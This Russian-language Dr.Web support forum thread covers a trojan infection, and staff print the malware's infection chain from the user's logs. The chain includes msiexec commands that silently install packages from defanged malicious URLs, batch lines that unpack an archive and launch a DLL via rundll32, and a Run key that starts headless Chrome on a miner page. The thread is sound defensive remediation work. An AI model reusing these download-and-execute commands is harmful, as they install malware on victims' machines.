9 ответов в этой теме

[Synim]

Здравствуйте!

С момента установки утлиты и проверки системы на малвари продолжает видеть DPH:Trojan.Inject.2.16 после перезагрузки. Видит, перемещает. И снова видит.
Заранее спасибо за помощь, прикрепляю требуемые отчёты ниже.
sysinfo: https://drive.google.com/file/d/1ZE0en7nJ9ihYjzfTXbwpCOwNJOFriHIY/view

Прикрепленные файлы:

•  Screenshot_26.png   7,08К   0 Скачано раз
•  Screenshot_27.png   643,12К   0 Скачано раз
•  hijackthis.log   16,54К   4 Скачано раз

Сообщение было изменено Synim: 30 Ноябрь 2018 - 23:23

[Dr.Robot]

1. Если Вы подозреваете у себя на компьютере вирусную активность и хотите получить помощь в этом разделе,

Вам необходимо кроме описания проблемы приложить к письму логи работы трёх программ - сканера Dr. Web (или CureIt!, если антивирус Dr. Web не установлен на Вашем ПК), Hijackthis и DrWeb SysInfo. Где найти эти программы и как сделать логи описано в Инструкции. Без логов помочь Вам не сможет даже самый квалифицированный специалист.

2. Если у Вас при включении компьютера появляется окно с требованием перечислить некоторую сумму денег и при этом блокируется доступ к рабочему столу,

- попытайтесь найти коды разблокировки здесь https://www.drweb.com/xperf/unlocker/
- детально опишите как выглядит это окно (цвет, текст, количество кнопок, появляется ли оно до появления окна приветствия Windows или сразу же после включении компьютера);
- дождаться ответа аналитика или хелпера;

3. Если у Вас зашифрованы файлы,

Внимание! Услуга по расшифровке файлов предоставляется только лицензионным пользователям продуктов Dr.Web, у которых на момент заражения была установлена коммерческая лицензия Dr.Web Security Space не ниже версии 9.0, Антивирус Dr.Web для Windows не ниже версии 9.0 или Dr.Web Enterprise Security Suite не ниже версии 6.0. подробнее.

Что НЕ нужно делать:
- лечить и удалять найденные антивирусом вирусы в автоматическом режиме или самостоятельно. Можно переместить всё найденное в карантин, а после спросить специалистов или не предпринимать никаких действий, а просто сообщить название найденных вирусов;
- переустанавливать операционную систему;
- менять расширение у зашифрованных файлов;
- очищать папки с временными файлами, а также историю браузера;
- использовать самостоятельно без консультации с вирусным аналитиком Dr. Web дешифраторы из "Аптечки сисадмина" Dr. Web;
- использовать дешифраторы рекомендуемые в других темах с аналогичной проблемой.

Что необходимо сделать:
- прислать в вирусную лабораторию Dr. Web https://support.drweb.com/new/free_unlocker/?keyno=&for_decode=1 несколько зашифрованных файлов и, если есть, их не зашифрованные копии в категорию Запрос на лечение. Дожидаться ответа на Вашу почту вирусного аналитика и далее следовать его указаниям ведя с ним переписку по почте. На форуме рекомендуется указать номер тикета вирлаба - это номер Вашего запроса, содержащий строку вида [drweb.com #3219200];


4. При возникновении проблем с интернетом, таких как "не открываются сайты", в браузерах появляются картинки с порно или рекламным содержанием там, где раньше ничего подобного не было, появляются надписи типа "Содержание сайта заблокировано" и пр. нестандартные уведомления необходимо выложить дополнительно к логам из п.1 лог команды ipconfig


Для этого проделайте следующее:

• Зайдите в меню Пуск на Рабочем столе, вызовите в нем окно команды Выполнить...
• В появившемся окне наберите cmd и нажмите клавишу <Enter>. Появится черное окно консоли (интерпретатора команд).
• Напишите в этом черном окне команду ipconfig /all>"%userprofile%\ipc.log" и нажмите клавишу <Enter>, затем наберите там же команду explorer.exe /select,"%userprofile%\ipc.log" и нажмите клавишу <Enter>, нужный файл будет показан в Проводнике Windows.
• Приложите этот файл к своему сообщению на форуме.

Чтобы не сделать ошибок в написании команд, можно скопировать эти команды отсюда и последовательно вставлять в черное окно консоли путем выбора пункта Вставить из меню, появляющегося при нажатии правой кнопки мыши в черном окне консоли.

[VVS]

А что такое этот chrome_watcher?

[Konstantin Yudin]

как минимум открыть планировщик задач и удалить задания

\{EA6C8557-8AFB-6D15-804F-E28ABA5623B8}
\{342DF515-7293-33DF-006E-EFA406E100B8}

каталог Program Files (x86)\Common Files\wrap-master_bin упакуйте в архив и отправьте в вирлаб https://vms.drweb.com/sendvirus/

флоу заражения для истории:

<item name="\{EA6C8557-8AFB-6D15-804F-E28ABA5623B8}" state="ready" command="&quot;msiexec&quot; /q -package hxxps://refreshnerer711.info/r7r1qlR71A7p.S83" threat="MSTASK:SUSPICIOUS.Downloader" arkstatus="unknown_malware" />
<item name="\{342DF515-7293-33DF-006E-EFA406E100B8}" state="ready" command="&quot;C:\Users\Влад\AppData\Local\tiuEEaU.exe&quot; -q -i hxxps://refreshnerer711rb.info/F8jeHPcx0nS1.cA9" />

вот это тоже какое то подозрительное

<item sid="HKLM" key="Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run" value="chrome" data="&quot;C:\Program Files (x86)\Google\Chrome\Application\chrome.exe&quot; --headless --disable-gpu --remote-debugging-port=9222 hxxp://ner-de-mi-nis-6.info/cdn-495.html?t=0.4" threat="REG:SUSPICIOUS.Downloader" />
<item sid="HKLM" key="Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run" value="chrome" data="&quot;C:\Program Files (x86)\Google\Chrome\Application\chrome.exe&quot; --headless --disable-gpu --remote-debugging-port=9222 hxxp://ner-de-mi-nis-6.info/cdn-495.html?t=0.4" />


msi скачал малварь и начал заражение. все осело в \Device\HarddiskVolume3\Program Files (x86)\Common Files\wrap-master_bin

2018-Nov-30 20:10:07.908232 [ 9544] [INF] [arkdll] [8884]

id: 2640, timestamp: 20:10:07.891, type: PsCreate (16), flags: 1 (wait: 1)
sid: S-1-5-18, cid: 1396/1556:\Device\HarddiskVolume3\Windows\System32\svchost.exe
context: start addr: 0x7ffb0e40f320, image: 0x7ffb0e3f0000:\Device\HarddiskVolume3\Windows\System32\ntdll.dll
created process: \Device\HarddiskVolume3\Windows\System32\svchost.exe:1396 => \Device\HarddiskVolume3\Users\Влад\AppData\Local\tiuEEaU.exe:6884
sid: S-1-5-21-732226289-3406509952-883499769-1001, bitness: 32, ilevel: high, sesion id: 1, type: 0, reason: 0, new: 0, dbg: 0, wsl: 0
curdir: C:\WINDOWS\system32\, cmd: C:\Users\Влад\AppData\Local\tiuEEaU.exe -q -i hxxps://refreshnerer711rb.info/F8jeHPcx0nS1.cA9
fileinfo: size: 60416, easize: 92, attr: 0x80, buildtime: 04.10.1939 17:54:47.000, ctime: 29.11.2018 00:40:07.878, atime: 29.11.2018 00:40:07.878, mtime: 04.11.2018 21:30:57.284, descr: Windows® installer, ver: 5.0.17134.228 (WinBuild.160101.0800), company: Microsoft Corporation, oname: msiexec.exe
catfile: {F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2064_for_KB4462933~31bf3856ad364e35~amd64~~10.0.1.8.cat
hash: e1d422903efeb3b85834da59c1e1c6a357da2fe0 status: signed_catroot, system_file_host, pe32 / signed_catroot / unknown / msiexec
id: 2640 ==> undefined [1], time: 0.642553 ms

2018-Nov-30 20:10:08.167541 [ 9556] [INF] [arkdll] [8884]

id: 2669, timestamp: 20:10:08.160, type: MsiInstall (62), flags: 1 (wait: 1)
sid: S-1-5-18, cid: 11220/11064:\Device\HarddiskVolume3\Windows\System32\msiexec.exe
context: start addr: 0x7ffb0e40f320, image: 0x7ffb0e3f0000:\Device\HarddiskVolume3\Windows\System32\ntdll.dll
operation: begin
request by: \Device\HarddiskVolume3\Users\Влад\AppData\Local\tiuEEaU.exe:6884
fileinfo: size: 60416, easize: 92, attr: 0x80, buildtime: 04.10.1939 17:54:47.000, ctime: 29.11.2018 00:40:07.878, atime: 29.11.2018 00:40:07.878, mtime: 04.11.2018 21:30:57.284, descr: Windows® installer, ver: 5.0.17134.228 (WinBuild.160101.0800), company: Microsoft Corporation, oname: msiexec.exe
catfile: {F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_2064_for_KB4462933~31bf3856ad364e35~amd64~~10.0.1.8.cat
hash: e1d422903efeb3b85834da59c1e1c6a357da2fe0 status: signed_catroot, system_file_host, pe32 / signed_catroot / unknown / msiexec
package name: hxxps://refreshnerer711rb.info/F8jeHPcx0nS1.cA9
trusted: 0
method:
env: CURRENTDIRECTORY="C:\WINDOWS\system32" CLIENTUILEVEL=3 CLIENTPROCESSID=6884
server: \Device\HarddiskVolume3\Windows\System32\msiexec.exe:11220
fileinfo: size: 66048, easize: 92, attr: 0x20, buildtime: 21.01.2012 11:40:15.000, ctime: 04.11.2018 21:30:51.114, atime: 04.11.2018 21:30:52.192, mtime: 04.11.2018 21:30:51.114, descr: Windows® installer, ver: 5.0.17134.228 (WinBuild.160101.0800), company: Microsoft Corporation, oname: msiexec.exe
catfile: {F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1380_for_KB4462933~31bf3856ad364e35~amd64~~10.0.1.8.cat
hash: 0c01e942244f1ed095d5ec92da2fa043565c5cdd status: signed_catroot, sfc, system_file_host, pe64 / signed_catroot / unknown / msiexec
id: 2669 ==> allowed [2], time: 0.115236 ms

2018-Nov-30 20:10:11.066962 [ 9564] [INF] [arkdll] [8920]

id: 2864, timestamp: 20:10:11.028, type: FileExecWrite (53), flags: 1 (wait: 1)
sid: S-1-5-18, cid: 11220/10388:\Device\HarddiskVolume3\Windows\System32\msiexec.exe
context: start addr: 0x7ffaeae15950, image: 0x7ffaeab10000:\Device\HarddiskVolume3\Windows\System32\msi.dll
fileinfo: size: 167936, easize: 40, attr: 0x20, buildtime: 01.03.2005 00:51:12.000, ctime: 13.02.2018 02:33:12.000, atime: 30.11.2018 20:10:11.028, mtime: 13.02.2018 02:33:12.000, descr: , ver: , company: , oname:
hash: e1652b058195db3f5f754b7ab430652ae04a50b8 status: unsigned, pe32 / unsigned / unknown / unknown
type: unknown, drop new executable: \Device\HarddiskVolume3\Program Files (x86)\Common Files\wrap-master_bin\z.exe
id: 2864 ==> allowed [2], time: 37.902271 ms

2018-Nov-30 20:10:11.359347 [ 9564] [INF] [arkdll] [8920]

id: 2896, timestamp: 20:10:11.344, type: PsCreate (16), flags: 1 (wait: 1)
sid: S-1-5-21-732226289-3406509952-883499769-1001, cid: 7632/6552:\Device\HarddiskVolume3\Windows\SysWOW64\msiexec.exe
context: start addr: 0x66f1d5f0, image: 0x66da0000:\Device\HarddiskVolume3\Windows\SysWOW64\msi.dll
created process: \Device\HarddiskVolume3\Windows\SysWOW64\msiexec.exe:7632 => \Device\HarddiskVolume3\Windows\SysWOW64\cmd.exe:11200
sid: S-1-5-21-732226289-3406509952-883499769-1001, bitness: 32, ilevel: high, sesion id: 1, type: 0, reason: 3, new: 1, dbg: 0, wsl: 0
curdir: C:\WINDOWS\SysWOW64\, cmd: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files (x86)\Common Files\\wrap-master_bin\f.bat" "
status: signed_microsoft, script_vm / signed_microsoft / unknown / cmd
object: C:\WINDOWS\system32\cmd.exe ==> not a script file
object: cmdline ==> Ok [0]
id: 2896 ==> allowed [2], time: 8.837482 ms

2018-Nov-30 20:10:11.506435 [ 9564] [INF] [arkdll] [8920]

id: 2907, timestamp: 20:10:11.493, type: PsCreate (16), flags: 1 (wait: 1)
sid: S-1-5-21-732226289-3406509952-883499769-1001, cid: 7632/6024:\Device\HarddiskVolume3\Windows\SysWOW64\msiexec.exe
context: start addr: 0x66f1d5f0, image: 0x66da0000:\Device\HarddiskVolume3\Windows\SysWOW64\msi.dll
created process: \Device\HarddiskVolume3\Windows\SysWOW64\msiexec.exe:7632 => \Device\HarddiskVolume3\Windows\SysWOW64\cmd.exe:9772
sid: S-1-5-21-732226289-3406509952-883499769-1001, bitness: 32, ilevel: high, sesion id: 1, type: 0, reason: 3, new: 1, dbg: 0, wsl: 0
curdir: C:\WINDOWS\SysWOW64\, cmd: "cmd" /c "cd "C:\Program Files (x86)\Common Files\\wrap-master_bin\"&z -o -P 00Jmsjeh20 archive00.x"
status: signed_microsoft, script_vm / signed_microsoft / unknown / cmd
object: cmdline ==> Ok [0]
id: 2907 ==> allowed [2], time: 7.138105 ms

2018-Nov-30 20:10:11.540268 [ 9564] [INF] [arkdll] [8920]

id: 2912, timestamp: 20:10:11.533, type: PsCreate (16), flags: 1 (wait: 1)
sid: S-1-5-21-732226289-3406509952-883499769-1001, cid: 9772/9648:\Device\HarddiskVolume3\Windows\SysWOW64\cmd.exe
context: start addr: 0xfc6fc0, image: 0xfb0000:\Device\HarddiskVolume3\Windows\SysWOW64\cmd.exe
created process: \Device\HarddiskVolume3\Windows\SysWOW64\cmd.exe:9772 => \Device\HarddiskVolume3\Program Files (x86)\Common Files\wrap-master_bin\z.exe:8436
sid: S-1-5-21-732226289-3406509952-883499769-1001, bitness: 32, ilevel: high, sesion id: 1, type: 0, reason: 1, new: 1, dbg: 0, wsl: 0
curdir: C:\Program Files (x86)\Common Files\wrap-master_bin\, cmd: z -o -P 00Jmsjeh20 archive00.x
fileinfo: size: 167936, easize: 40, attr: 0x20, buildtime: 01.03.2005 00:51:12.000, ctime: 13.02.2018 02:33:12.000, atime: 30.11.2018 20:10:11.028, mtime: 13.02.2018 02:33:12.000, descr: , ver: , company: , oname:
hash: e1652b058195db3f5f754b7ab430652ae04a50b8 status: unsigned, pe32, new_pe / unsigned / unknown / unknown
id: 2912 ==> undefined [1], time: 1.653426 ms

2018-Nov-30 20:10:11.707464 [ 9564] [INF] [arkdll] [8920]

id: 2917, timestamp: 20:10:11.690, type: FileExecWrite (53), flags: 1 (wait: 1)
sid: S-1-5-21-732226289-3406509952-883499769-1001, cid: 8436/6508:\Device\HarddiskVolume3\Program Files (x86)\Common Files\wrap-master_bin\z.exe
context: start addr: 0x414878, image: 0x400000:\Device\HarddiskVolume3\Program Files (x86)\Common Files\wrap-master_bin\z.exe
fileinfo: size: 524800, easize: 40, attr: 0x20, buildtime: 20.06.1992 01:22:17.000, ctime: 30.11.2018 20:10:11.599, atime: 30.11.2018 20:10:11.599, mtime: 30.11.2018 20:10:11.690, descr: , ver: , company: , oname:
hash: 7cd6c49c632f6bee2be88ab370dfe577d762da74 status: unsigned, pe32, dll / unsigned / unknown / unknown
type: unknown, drop new executable: \Device\HarddiskVolume3\Program Files (x86)\Common Files\wrap-master_bin\chrome_watcher.dll
id: 2917 ==> allowed [2], time: 3.708358 ms

2018-Nov-30 20:10:11.781780 [ 9564] [INF] [arkdll] [8920]

id: 2921, timestamp: 20:10:11.780, type: FileExecDelete (55), flags: 1 (wait: 1)
sid: S-1-5-18, cid: 11220/6636:\Device\HarddiskVolume3\Windows\System32\msiexec.exe
context: start addr: 0x7ffaeac61940, image: 0x7ffaeab10000:\Device\HarddiskVolume3\Windows\System32\msi.dll
type: unknown, delete new executable: \Device\HarddiskVolume3\WINDOWS\Installer\MSIC845.tmp
id: 2921 ==> allowed [2], time: 0.239226 ms

2018-Nov-30 20:10:11.819212 [ 9564] [INF] [arkdll] [8920]

id: 2922, timestamp: 20:10:11.785, type: FileExecWrite (53), flags: 1 (wait: 1)
sid: S-1-5-18, cid: 11220/11240:\Device\HarddiskVolume3\Windows\System32\msiexec.exe
context: start addr: 0x7ffaeac6bfb0, image: 0x7ffaeab10000:\Device\HarddiskVolume3\Windows\System32\msi.dll
fileinfo: size: 207360, easize: 40, attr: 0x20, buildtime: 28.03.2017 12:22:54.000, ctime: 30.11.2018 20:10:11.782, atime: 30.11.2018 20:10:11.782, mtime: 30.11.2018 20:10:11.784, descr: WiX Custom Actions, ver: 3.11.0.1528, company: .NET Foundation, oname: wixca.dll
hash: 3afad7f09e8827db00552f71137c40459414fc9f status: unsigned, pe32, dll / unsigned / unknown / unknown
type: unknown, drop new executable: \Device\HarddiskVolume3\WINDOWS\Installer\MSIC9AE.tmp
id: 2922 ==> allowed [2], time: 33.541877 ms

2018-Nov-30 20:10:11.893819 [ 9564] [INF] [arkdll] [8920]

id: 2943, timestamp: 20:10:11.882, type: PsCreate (16), flags: 1 (wait: 1)
sid: S-1-5-21-732226289-3406509952-883499769-1001, cid: 7632/10064:\Device\HarddiskVolume3\Windows\SysWOW64\msiexec.exe
context: start addr: 0x66f1d5f0, image: 0x66da0000:\Device\HarddiskVolume3\Windows\SysWOW64\msi.dll
created process: \Device\HarddiskVolume3\Windows\SysWOW64\msiexec.exe:7632 => \Device\HarddiskVolume3\Windows\SysWOW64\cmd.exe:9960
sid: S-1-5-21-732226289-3406509952-883499769-1001, bitness: 32, ilevel: high, sesion id: 1, type: 0, reason: 3, new: 1, dbg: 0, wsl: 0
curdir: C:\WINDOWS\SysWOW64\, cmd: "cmd" /v:on /c "set herase=rundll32&set chinas=%random%&mkdir "C:\Program Files (x86)\Common Files\\wrap-master_bin\!chinas!"&cd "C:\Program Files (x86)\Common Files\\wrap-master_bin\!chinas!\"&move /y "C:\Program Files (x86)\Common Files\\wrap-master_bin\*.*" "C:\Program Files (x86)\Common Files\\wrap-master_bin\!chinas!"\&!herase! chrome_watcher.dll,Entry u"
status: signed_microsoft, script_vm / signed_microsoft / unknown / cmd
object: cmdline ==> Ok [0]
id: 2943 ==> allowed [2], time: 7.122790 ms

id: 2948, timestamp: 20:10:11.935, type: PsCreate (16), flags: 1 (wait: 1)
sid: S-1-5-21-732226289-3406509952-883499769-1001, cid: 9960/9300:\Device\HarddiskVolume3\Windows\SysWOW64\cmd.exe
context: start addr: 0xfc6fc0, image: 0xfb0000:\Device\HarddiskVolume3\Windows\SysWOW64\cmd.exe
created process: \Device\HarddiskVolume3\Windows\SysWOW64\cmd.exe:9960 => \Device\HarddiskVolume3\Windows\SysWOW64\rundll32.exe:1244
sid: S-1-5-21-732226289-3406509952-883499769-1001, bitness: 32, ilevel: high, sesion id: 1, type: 0, reason: 3, new: 1, dbg: 0, wsl: 0
curdir: C:\Program Files (x86)\Common Files\wrap-master_bin\6771\, cmd: rundll32 chrome_watcher.dll,Entry u
status: signed_microsoft, system_file_host / signed_microsoft / unknown / rundll
object: cmdline ==> Ok [0]
id: 2948 ==> allowed [2], time: 5.770218 ms

2018-Nov-30 20:10:14.444010 [ 9556] [INF] [arkdll] [8920]

id: 3059, timestamp: 20:10:14.436, type: PsCreate (16), flags: 1 (wait: 1)
sid: S-1-5-21-732226289-3406509952-883499769-1001, cid: 1244/10268:\Device\HarddiskVolume3\Windows\SysWOW64\rundll32.exe
context: start addr: 0x75189770, image: 0x75170000:\Device\HarddiskVolume3\Windows\SysWOW64\SHCore.dll
created process: \Device\HarddiskVolume3\Windows\SysWOW64\rundll32.exe:1244 => \Device\HarddiskVolume3\Windows\SysWOW64\taskkill.exe:8440
sid: S-1-5-21-732226289-3406509952-883499769-1001, bitness: 32, ilevel: high, sesion id: 1, type: 0, reason: 2, new: 0, dbg: 0, wsl: 0
curdir: C:\Program Files (x86)\Common Files\wrap-master_bin\6771\, cmd: "C:\Windows\System32\taskkill.exe" /IM msiexec.exe /F
status: signed_microsoft, signed_catroot, sfc, pe32, spc / signed_microsoft / unknown / unknown
id: 3059 ==> allowed [2], time: 0.276057 ms

2018-Nov-30 20:10:38.580491 [ 9544] [INF] [arkdll] [8884]

id: 3085, timestamp: 20:10:14.576, type: PsInject (43), flags: 1 (wait: 1)
sid: S-1-5-21-732226289-3406509952-883499769-1001, cid: 1244/10548:\Device\HarddiskVolume3\Windows\SysWOW64\rundll32.exe
context: start addr: 0x1386150, image: 0x1380000:\Device\HarddiskVolume3\Windows\SysWOW64\rundll32.exe
hips: type: 18, action: deny [5]
curdir: C:\Program Files (x86)\Common Files\wrap-master_bin\6771\, cmd: rundll32 chrome_watcher.dll,Entry u
fileinfo: size: 61952, easize: 248, attr: 0x20, buildtime: 0, ctime: 12.04.2018 02:34:59.340, atime: 12.04.2018 02:34:59.340, mtime: 12.04.2018 02:34:59.340, descr: Windows host process (Rundll32), ver: 10.0.17134.1 (WinBuild.160101.0800), company: Microsoft Corporation, oname: RUNDLL32.EXE
status: signed_microsoft, system_file_host / signed_microsoft / unknown / rundll
inject: ChangeThreadContext [2], flags: 0x10, start addr: 0x77e6c790, addr: 0x0, param: 0x0, len: 0, target: bitness: 32, init: 0, image: \Device\HarddiskVolume3\Windows\SysWOW64\svchost.exe:7644
fileinfo: size: 44520, easize: 260, attr: 0x20, buildtime: 0, ctime: 12.04.2018 02:34:51.464, atime: 12.04.2018 02:34:51.464, mtime: 12.04.2018 02:34:51.464, descr: Host Process for Windows Services, ver: 10.0.17134.1 (WinBuild.160101.0800), company: Microsoft Corporation, oname: svchost.exe
status: signed_microsoft, system_file_host / signed_microsoft / unknown / svchost
inject type: unknown func call from image: \Device\HarddiskVolume3\Windows\SysWOW64\ntdll.dll
resolved path: C:\WINDOWS\SysWOW64\rundll32.exe, status: signed_microsoft, system_file_host (40800)
resolved path: C:\WINDOWS\SysWOW64\rundll32.exe ==> allowed
resolved path: C:\Program Files (x86)\Common Files\wrap-master_bin\6771\chrome_watcher.dll, status: unsigned, pe32, new_pe, dll (2900400)
resolved path: C:\Program Files (x86)\Common Files\wrap-master_bin\6771\chrome_watcher.dll ==> suspicious
threat: DPH:Trojan.Inject.2.16 ==> send user blocked alert
path: \Device\HarddiskVolume3\Program Files (x86)\Common Files\wrap-master_bin\6771\chrome_watcher.dll ==> denied access to file
path: \Device\HarddiskVolume3\Program Files (x86)\Common Files\wrap-master_bin\6771\chrome_watcher.dll ==> quarantined
disinfect: \Device\HarddiskVolume3\Program Files (x86)\Common Files\wrap-master_bin\6771\chrome_watcher.dll ==> quarantined, reboot required [1000008]
analyze object behavior and find traces:
can't find traces for object: \Device\HarddiskVolume3\Program Files (x86)\Common Files\wrap-master_bin\6771\chrome_watcher.dll
threat: DPH:Trojan.Inject.2.16 ==> sended user virus found alert
process: \Device\HarddiskVolume3\Windows\SysWOW64\rundll32.exe:1244 ==> suspended all threads in process
send driver event reply for unblock process ==> success
process: \Device\HarddiskVolume3\Windows\SysWOW64\rundll32.exe:1244 ==> terminated
process: \Device\HarddiskVolume3\Windows\SysWOW64\svchost.exe:7644 ==> suspended all threads in process
process: \Device\HarddiskVolume3\Windows\SysWOW64\svchost.exe:7644 ==> terminated
send user blocked alert
id: 3085 ==> denied [5], time: 24003.463662 ms

[Konstantin Yudin]

Program Files (x86)\Common Files\wrap-master_bin\6771\chrome_watcher.dll эта длл уже в карантине, надо ее достать от туда и так же отправить в виирлаб

[Konstantin Yudin]

O4 - HKLM\..\Run: [chrome] "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --headless --disable-gpu --remote-debugging-port=9222 hxxp://ner-de-mi-nis-6.info/cdn-495.html?t=0.4

пофиксите эту строчку в hijackthis. гугл говорит что это майнер

[Synim]

Удалил, пофиксил, снёс заодно Chrome, спасибо.
Я бы и рад всё отправить, но...
Вот это мне очень не нравится

Прикрепленные файлы:

•  Screenshot_29.png   10,81К   0 Скачано раз
•  Screenshot_32.png   12,09К   0 Скачано раз

[Synim]

Даже после фикса продолжаю наблюдать.

Прикрепленные файлы:

•  Screenshot_122.png   73,8К   0 Скачано раз

Сообщение было изменено Synim: 01 Декабрь 2018 - 02:42

[Ivan Korolev]

Смотрю ваши логи, как закончу - отпишусь.

[Ivan Korolev]

Троянов добавил, как придет нужное обновление, Spider Guard их удалит.